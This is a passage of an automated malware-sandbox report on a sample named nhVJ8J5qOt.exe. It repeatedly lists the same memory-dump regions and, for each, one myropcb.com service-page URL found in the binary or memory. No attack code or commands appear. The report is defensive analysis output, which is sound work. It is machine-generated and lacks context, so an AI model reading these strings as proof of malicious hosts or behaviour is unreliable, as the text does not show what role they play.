                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/an-introduction-to-high-density-interconnect-hdi-pcbs/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/components-parts/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/customized-cable/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/enclosure/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/fpc-flexible-printed-circuits/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/hdipcb/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/myro-intelligent-cloud-forehead-thermometer/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-capabilities/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-design-layout/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-restoration/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcba-services/
